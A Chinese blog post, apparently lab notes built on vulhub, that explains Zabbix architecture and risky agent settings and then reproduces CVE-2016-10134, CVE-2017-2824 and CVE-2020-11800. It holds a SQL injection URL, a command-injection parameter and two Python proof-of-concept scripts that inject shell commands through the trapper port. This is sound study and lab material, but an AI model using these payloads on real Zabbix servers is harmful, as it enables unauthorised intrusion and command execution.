Zabbix攻击分析与利用

最新推荐文章于 2023-08-21 08:00:00 发布
最新推荐文章于 2023-08-21 08:00:00 发布
阅读量552 收藏
点赞数
分类专栏: vulhub 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/119778945
版权

目录

Zabbix简介

Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案,客户覆盖许多大型企业。

Zabbix监控系统由以下几个组件部分构成:

Zabbix Server

Zabbix Server是所有配置、统计和操作数据的中央存储中心,也是Zabbix监控系统的告警中心。在监控的系统中出现任何异常,将被发出通知给管理员。

Zabbix Server的功能可分解成为三个不同的组件,分别为Zabbix Server服务、Web后台及数据库。

Zabbix Proxy

Zabbix Proxy是在大规模分布式监控场景中采用一种分担Zabbix Server压力的分层结构,其多用在跨机房、跨网络的环境中,Zabbix Proxy可以代替Zabbix Server收集性能和可用性数据,然后把数据汇报给Zabbix Server,并且在一定程度上分担了Zabbix Server的压力。

Zabbix Agent

Zabbix Agent部署在被监控的目标机器上,以主动监控本地资源和应用程序(硬盘、内存、处理器统计信息等)。

Zabbix Agent收集本地的状态信息并将数据上报给Zabbix Server用于进一步处理。

Zabbix网络架构

对于Zabbix Agent客户端来说,根据请求类型可分为被动模式及主动模式:

  • 被动模式:Server向Agent的10050端口获取监控项数据,Agent根据监控项收集本机数据并响应。
  • 主动模式:Agent主动请求Server(Proxy)的10051端口获取监控项列表,并根据监控项收集本机数据提交给Server(Proxy)

从网络部署架构上看,可分为Server-Client架构、Server-Proxy-Client架构、Master-Node-Client架构:

Server-Client架构

最为常见的Zabbix部署架构,Server与Agent同处于内网区域,Agent能够直接与Server通讯,不受跨区域限制。

在这里插入图片描述
Server-Proxy-Client架构

多数见于大规模监控需求的企业内网,其多用在跨机房、跨网络的环境,由于Agent无法直接与位于其他区域的Server通讯,需要由各区域Proxy代替收集Agent数据然后再上报Server。

在这里插入图片描述

Zabbix Agent配置分析

从进程列表中可判断当前机器是否已运行zabbix_agentd服务,Linux进程名为zabbix_agentd,Windows进程名为zabbix_agentd.exe

Zabbix Agent服务的配置文件为zabbix_agentd.conf,Linux默认路径在/etc/zabbix/zabbix_agentd.conf,可通过以下命令查看agent配置文件并过滤掉注释内容:

cat /etc/zabbix/zabbix_agentd.conf | grep -v '^#' | grep -v '^$'

首先从配置文件定位zabbix_agentd服务的基本信息:

Server参数

Server或Proxy的IP、CIDR、域名等,Agent仅接受来自Server参数的IP请求。

Server=192.168.10.100

ServerActive参数

Server或Proxy的IP、CIDR、域名等,用于主动模式,Agent主动向ServerActive参数的IP发送请求。

ServerActive=192.168.10.100

StartAgents参数

为0时禁用被动模式,不监听10050端口。

StartAgents=0

经过对 zabbix_agentd.conf 配置文件各个参数的安全性研究,总结出以下配置不当可能导致安全风险的配置项:

EnableRemoteCommands参数

是否允许来自Zabbix Server的远程命令,开启后可通过Server下发shell脚本在Agent上执行。

风险样例:

EnableRemoteCommands=1

AllowRoot参数

Linux默认以低权限用户zabbix运行,开启后以root权限运行zabbix_agentd服务。

风险样例:

AllowRoot=1

UserParameter参数

自定义用户参数,格式为UserParameter=<key>,<command>,Server可向Agent执行预设的自定义参数命令以获取监控数据,以官方示例为例:

UserParameter=ping[*],echo $1

当Server向Agent执行ping[aaaa]指令时,$1为传参的值,Agent经过拼接之后执行的命令为echo aaaa,最终执行结果为aaaa

command存在命令拼接,但由于传参内容受UnsafeUserParameters参数限制,默认无法传参特殊符号,所以默认配置利用场景有限。

UnsafeUserParameters参数

自定义用户参数是否允许传参任意字符,默认不允许字符\ ‘ “ ` * ? [ ] { } ~ $ ! & ; ( ) < > | # @

风险样例:

UnsafeUserParameters=1

当UnsafeUserParameters参数配置不当时,组合UserParameter自定义参数的传参命令拼接,可导致远程命令注入漏洞。

由Server向Agent下发指令执行自定义参数,即可在Agent上执行任意系统命令。
UserParameter=ping[*],echo $1 为例,向Agent执行指令ping[test && whoami],经过命令拼接后最终执行echo test && whoami,成功注入执行shell命令。

Include参数

加载配置文件目录单个文件或所有文件,通常包含的conf都是配置UserParameter自定义用户参数。

Include=/etc/zabbix/zabbix_agentd.d/*.conf

Zabbix漏洞复现

CVE-2016-10134

CVE-2016-10134:zabbix latest.php SQL注入漏洞

攻击机已知靶机ip,且靶机系统未关闭默认开启guest账户登陆.

访问http://192.168.50.113:8080/,用账号guest(密码为空)登录游客账户

在这里插入图片描述
登录后,查看Cookie中的zbx_sessionid,复制后16位字符:
在这里插入图片描述
将这16个字符作为sid的值,访问

http://192.168.50.113:8080/latest.php?output=ajax&sid=ad52758bba8163d4&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

在这里插入图片描述

成功注入。

这个漏洞也可以通过jsrpc.php触发,且无需登录:

在这里插入图片描述

CVE-2017-2824

CVE-2017-2824:Zabbix Server trapper命令注入漏洞

docker-compose up -d

启动一个完整的Zabbix环境,包括Web端、Server端、1个Agent和Mysql数据库:

在这里插入图片描述
利用该漏洞,需要你服务端开启了自动注册功能,所以我们先以管理员的身份开启自动注册功能。

使用账号密码admin/zabbix登录后台,进入Configuration->Actions,将Event source调整为Auto registration,然后点击Create action,创建一个Action,名字随意:

在这里插入图片描述
第三个标签页,创建一个Operation,type是“Add Host”:

在这里插入图片描述
保存。这样就开启了自动注册功能,攻击者可以将自己的服务器注册为Agent。

简单POC:

import sys
import socket
import json
import sys


def send(ip, data):
    conn = socket.create_connection((ip, 10051), 10)
    conn.send(json.dumps(data).encode())
    data = conn.recv(2048)
    conn.close()
    return data


target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
for i in range(10000, 10500):
    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
    if data and b'failed' not in data:
        print('hostid: %d' % i)
        print(data)

这个POC比较初级,请多执行几次,当查看到如下结果时,则说明命令执行成功:
在这里插入图片描述
进入server容器,可见/tmp/success已成功创建:

在这里插入图片描述

CVE-2020-11800

CVE-2020-11800:Zabbix Server trapper命令注入漏洞

在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。

一个完整的Zabbix环境,包含Web端、Server端、1个Agent和Mysql数据库:

docker-compose up -d

POC:

import sys
import socket
import json
import sys


def send(ip, data):
    conn = socket.create_connection((ip, 10051), 10)
    conn.send(json.dumps(data).encode())
    data = conn.recv(2048)
    conn.close()
    return data


target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):
    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
    if data and b'failed' not in data:
        print('hostid: %d' % i)
        print(data)

命令执行成功:
在这里插入图片描述
在这里插入图片描述

她总是阴雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
05 ZabbixPing监控
Jian Sun_的博客
11-23 3074
ZabbixPing监控
漏洞复现-zabbix系列
aming小老弟
01-09 5619
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。该系统支持网络监控、服务器监控、云监控和应用监控等。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
Zabbix-agent 增加自定义监控项-- Ping 到目的地 IP 链路监控
⎛⎝世界⎠⎞的博客
06-18 2196
zabbix-agent 上Ping 到目的地 IP 链路监控。总部 和 分支 站点间数据走 SDWAN,但有时候碰到链路故障,路由没及时切换,会导致用户断网。所以想通过 Zabbix 监控 总部 到 分支的链路状态 并 告警方便及时处理。 而想让被监控端执行一个Zabbix 没有预定义的检测, 需要使用 Zabbix 的用户自定义参数功能提供了这个方法.我们可以在客户端配置文件 zabbix_angentd.conf 里面配置 UserParameter 。 ....
zabbix监控外网地址-使用zabbix icmp-ping监控网络状态
热门推荐
zhangdd的博客
04-27 2万+
    公司使用了三线接入,联通.电信.移动最近发现一个问题,有时候网站经常打不开,或者打开的速度很慢,查找原因发现三线之中的一条线路丢包很严重,打客服电话官方回答“线路受到非法攻击,技术人员正在解决”。还好用的是三线,直接dnspod把出问题的线路解析关掉,果然一切正常了。于是问题来了,怎么才能及时发现哪条线路出问题呢,这里我们介绍下使用zabbix icmp-ping监控网络状态的配置。   ...
zabbix实现ping监控
liuyu_719的博客
03-21 1万+
zabbix持续ping监控安装zabbix新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 安装zabbix 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增
Zabbix攻击面挖掘与利用
jklbnm12的博客
09-11 567
一、简介 Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案,客户覆盖许多大型企业。本议题介绍了Zabbix基础架构、Zabbix Server攻击面以及权限后利用,如何在复杂内网环境中从Agent控制Server权限、再基于Server拿下所有内网Agent。 二、Zabbix监控组件 Zabbix监控系统由以下几个组件部分构成: 1. Zabbix Server Zabbix Server是所有配置、统计和操作数据的中央存储中心,也是Zabbix监控系统的告警中心。在监控的系统
zabbix 深信服AC模板
最新发布
01-15
Zabbix与深信服AC结合,可以实现对深信服AC设备的全面监控,及时发现并处理潜在问题。 "zabbix深信服AC模板"是专为监控深信服AC设备定制的Zabbix模板,通过导入这个模板,用户可以在Zabbix中轻松配置对深信服AC的...
ROS彻底防止UDP流量攻击教程
03-29
8. **监控与告警**:结合第三方工具如Zabbix或Nagios,设置流量异常时的报警机制,一旦检测到异常流量,能及时通知管理员。 9. **定期更新和补丁**:保持ROS系统的最新版本,确保已修复可能被利用的安全漏洞。 10....
网络监控技术的研究与应用
03-18
常见的网络监控工具包括Nagios、Zabbix、PRTG Network Monitor等,它们提供丰富的监控指标,支持自定义告警规则,可以集成到现有的IT管理系统中。 六、未来发展趋势 随着5G、边缘计算等新技术的发展,网络监控将...
网络运行情况分析方法论
11-16
3. 故障识别:通过对数据的分析,找出可能导致网络问题的迹象,如高延迟、丢包率上升、带宽利用率异常等。 4. 原因排查:确定问题的可能原因,这可能涉及硬件故障、配置错误、软件bug或是外部攻击。 5. 实施解决...
windows版wgcloud-v3.3.2
04-28
wgcloud与Zabbix的集成使得用户可以直接在wgcloud界面中查看和管理Zabbix监控数据,实现统一的运维视图,提高故障排查效率。通过集成,用户可以设置告警规则、创建自定义图形,并获取全面的性能报告。 **Grafana...
服务器安全篇之五【入侵检测】
huangfujin321的博客
09-17 530
服务器安全篇之五【入侵检测】 设计者:普金 服务器安全全篇含: 服务器安全篇之一【网络安全】 服务器安全篇之二【ssh安全】 服务器安全篇之三【系统安全】 服务器安全篇之四【数据库灾备与恢复】 服务器安全篇之五【入侵检测】 服务器安全篇之六【入侵处理】   一 摘要 前面讲了防御与安全,但是俗话说,没有钻不透的钢板,没有攻不破的城墙,放在我们IT行业同样适用,没有攻不破的网络,没有绝对的信息安全。...
漏洞复现--Zabbix远程代码执行漏洞(CVE-2020-11800含EXP)
HengMengSec的博客
08-21 1983
漏洞复现--Zabbix远程代码执行漏洞(CVE-2020-11800含EXP)
Zabbix监控tcp的11种状态
人走茶良的博客
01-26 355
一、引入   1、网站因tcp受到的攻击     1)DoS(Denial of Service,拒绝服务)     2)DDoS(Distributed Denial of Service,分布式拒绝服务)   2、监控关键的状态      注:SYN_RCVD状态一般正常情况下监控不到,出现DDoS攻击时,才能监控到,所以zabbix我们要用zabbix监控这个状态   TIME_WAIT状态一般出现次数最多,负载均衡服务器不能优化,处在内网可以优化的,和负载均衡服务器不会出现丢包的情况的
Zabbix 远程代码执行漏洞(CVE-2020-11800)复现
锋刃科技的博客
01-14 5132
简介 Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 漏洞概述 Zabbix Server的trapper命令处理,存在命令注入漏洞,可导致远程代码执行。 影响版本 Zabbix 3.0.x~3.0.30 环境搭建 项目地址 https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2020-11800 ...
CVE-2020-11800 —— Zabbix 远程代码执行漏洞
战神/calmness的博客
12-10 880
目录 ​ Zabbix 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11800 | Zabbix 远程代码执行漏洞 Zabbix 组件介绍 Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级开源解决方案。Zabbix能监视各种网络参数,保证服务器系统的安全运营,并提供灵活的通知机制以便系统管理员快速定位和解决存在的各种问题。 它由两部分构成,Zabbix Server与可选组件Zabbix Agent。Zabbix server可以通过SNMP,Za
Zabbix Server trapper两个命令注入漏洞(CVE-2017-2824和CVE-2020-11800)
黑白的博客
05-02 2187
声明 好好学习,天天向上 CVE-2017-2824 漏洞描述 Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。 影响范围 Zabbix 2.4.7 - 2.4.8r1 复现过程 这里使用3.0.3版本 使用vulhub /app/vulhub-m
zabbix监控深信服_Zabbix 远程代码执行漏洞CVE202011800
weixin_28899845的博客
12-06 472
漏洞概要 漏洞名称:Zabbix 远程代码执行漏洞CVE-2020-11800威胁等级:高危影响范围:Zabbix 3.2 (已不支持)Zabbix 3.0 -3.0.30Zabbix 2.2.18 - 2.2.x(已不支持)漏洞类型:远程代码执行 漏洞分析 2.1 Zabbix 组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级开...
追洞小组 | 实战CVE-2020-16898漏洞复现
Ms08067安全实验室
02-25 1303
三连一下,一起学安全文章来源|MS08067 WEB攻防知识星球本文作者:M-101(Ms08067实验室追洞小组成员) 漏洞复现分析 认准追洞小组漏洞名称Window...
Zabbix攻击面挖掘与利用1
08-03
Zabbix攻击面挖掘与利用的过程中,攻击者需要对Zabbix监控组件进行深入的理解,并且需要具有一定的网络和安全知识。攻击者可以利用Zabbix Server的监控功能来发现系统中的漏洞,并通过对系统进行分析和渗透来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值